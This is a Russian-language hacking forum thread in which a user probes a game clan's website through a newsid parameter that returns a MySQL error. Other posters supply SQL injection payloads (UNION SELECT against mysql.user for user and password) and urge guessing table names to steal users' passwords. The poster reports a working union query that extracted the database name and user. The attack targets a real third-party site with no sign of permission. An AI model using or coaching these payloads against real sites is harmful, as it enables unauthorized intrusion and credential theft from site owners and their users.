пРИВЕТ всем. Тут на сайте одного из кланов БК нашел вот что. Если сделать запрос на статью: newsid=' то вылазит: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72 sql-injection можно провести с помошью этого?
Хм а что ты нас то спрашиваешь. Ты сам не пробовал. Попробуй провести такой запрос Code: +union+select+1,2,user,password,5,6+from+mysql.user/* Если скажет acces denied то 100% скуль. Вот тебе статьи если что по скулям. http://www.forum.antichat.ru/thread19684.html http://www.forum.antichat.ru/thread19605.html
ура!!! сделал запрос: -1+union+select+1,2,3,4,5/* прокатило все. а как дальше строить запрос. помогите пожалуйста. да вот вытянул название бд и юзера. но не получаетсяс помошью этого: -1+union+select+1,2,user,password,5+from+mysql.us er/* вытянусть пасс
подбирай названия таблиц и столбцов, чтобы спереть пассы юзверей. Об sql можешь почитать тут ->->-> http://xzone.org.ru/index.php?name=Pages&op=page&pid=56
ничего не выдала. точнее то что и при простом ошибочном запросе. даже столбцов нету Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72